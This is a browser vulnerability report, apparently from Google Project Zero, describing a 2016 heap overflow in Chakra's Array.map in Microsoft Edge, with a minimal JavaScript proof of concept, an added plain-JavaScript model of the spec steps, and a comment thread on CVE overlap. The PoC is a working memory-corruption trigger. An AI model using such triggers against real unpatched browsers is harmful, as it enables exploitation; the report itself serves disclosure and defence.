Microsoft Edge: Heap Overflow in Array.map
Reported by natashenka@google.com (Project Member), Sep 1 2016
There is a heap overflow in Array.map in Chakra. In Js::JavascriptArray::MapHelper, if the array that is being mapped is a Proxy, ArraySpeciesCreate is used to create the array that the mapped values are copied into. They are then written to the array using DirectSetItemAt, even though there is no guarantee the array is a Var array. If it is actually an int array, it will be shorter than this function expects, causing a heap overflow. A minimal PoC is as follows:
```javascript
var d = new Array(1,2,3);             // short int array that becomes the map destination
class dummy {
  constructor() {
    alert("in constructor");
    return d;                         // the species constructor hands back the existing short array
  }
}
var handler = {
  get: function(target, name) {
    if (name == "length") {
      return 0x100;                   // map will attempt to write 0x100 elements
    }
    return {[Symbol.species] : dummy}; // also answers the "constructor" lookup in ArraySpeciesCreate
  },
  has: function(target, name) {
    return true;                      // every index is reported present, so every element is written
  }
};
var p = new Proxy([], handler);
var a = new Array(1,2,3);
function test() {
  return 0x777777777777;              // a value an int array cannot hold in place
}
var o = a.map.call(p, test);          // MapHelper writes past the end of d via DirectSetItemAt
```
A full PoC is attached.
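As an added illustration that is not code from the report or from ChakraCore, the following plain-JavaScript model of the ES2016 ArraySpeciesCreate and Array.prototype.map steps is run against a Proxy set up like the PoC: it shows that the species lookup is two user-controlled property reads, that the chosen constructor may return any existing object of any length, and that the spec's generic CreateDataProperty store stays safe where a raw element write that assumes a fresh Var array does not. The function names arraySpeciesCreate, specMap and runReportScenario are assumptions, and the realm check of ArraySpeciesCreate is omitted.

```javascript
// Added example, not code from the report or from ChakraCore: a plain-JavaScript
// model of the ES2016 ArraySpeciesCreate and Array.prototype.map steps.

// ArraySpeciesCreate(originalArray, length): two property reads the Proxy controls
// (the cross-realm check of the spec is omitted here).
function arraySpeciesCreate(original, length) {
  if (!Array.isArray(original)) return new Array(length); // IsArray sees through a Proxy
  let C = original.constructor;                            // Proxy "get" trap, name "constructor"
  if (C !== null && typeof C === "object") {
    C = C[Symbol.species];                                 // second lookup, on the returned object
    if (C === null) C = undefined;
  }
  if (C === undefined) return new Array(length);
  if (typeof C !== "function") throw new TypeError("species is not a constructor");
  return new C(length); // a constructor may return ANY existing object, of any length
}

// Array.prototype.map as specified: each store is CreateDataProperty, a generic
// property define that works on whatever A turns out to be, not a raw element write.
function specMap(O, callback) {
  let len = Math.trunc(Number(O.length));      // ToLength (simplified) -> Proxy "get" trap
  if (!(len > 0)) len = 0;
  const A = arraySpeciesCreate(O, len);
  for (let k = 0; k < len; k++) {
    const Pk = String(k);
    if (Pk in O) {                             // HasProperty -> Proxy "has" trap
      const mapped = callback(O[Pk], k, O);    // Get -> Proxy "get" trap
      Object.defineProperty(A, Pk, { value: mapped, writable: true, enumerable: true, configurable: true });
    }
  }
  return A;
}

// Constructed input mirroring the report's PoC: the species constructor returns a
// pre-existing 3-element array while the Proxy reports a length of 0x100.
function runReportScenario() {
  const d = [1, 2, 3];
  class Dummy { constructor() { return d; } }
  const handler = {
    get(target, name) {
      if (name === "length") return 0x100;
      return { [Symbol.species]: Dummy };      // also answers the "constructor" read
    },
    has() { return true; }
  };
  const p = new Proxy([], handler);
  const out = specMap(p, () => 0x777777777777);
  return { out, d };                           // out === d, grown to 256 elements safely
}
```

Under the generic store, d is simply extended to 256 elements; the engine bug is the fast path that assumes the species result is a freshly allocated Var array of the requested length.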
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
Comment 1 by natashenka@google.com (Project Member), Sep 8 2016
Comment, Oct 11 2016
Comment, Oct 12 2016
Comment, Oct 19 2016
Comment, Dec 11 2016:
Hi, I have a question. I think this issue is the same as CVE-2016-3377, which was fixed in September. Why does this issue have a different CVE number and get fixed again in October? Thanks for your help!
Reply, Dec 11 2016:
I took a look at this in September, and from what I could tell they fixed a different vulnerability in Array.map than the one I reported.
Comment, Dec 12 2016:
Hello, thanks for your patient reply. Here is the diff and PoC for 3377 from September: https://github.com/Microsoft/ChakraCore/commit/24c4d7df8199b27d360323ce3be1d7959fd918eb#diff-49bb5a3c5aa249e3dcefd245e91df5f7 Would you mind having a look, please? On the other hand, I can't reproduce your PoC in the versions between September and October.
Reply, Dec 15 2016:
I checked with Microsoft, and they confirmed these are the same issue.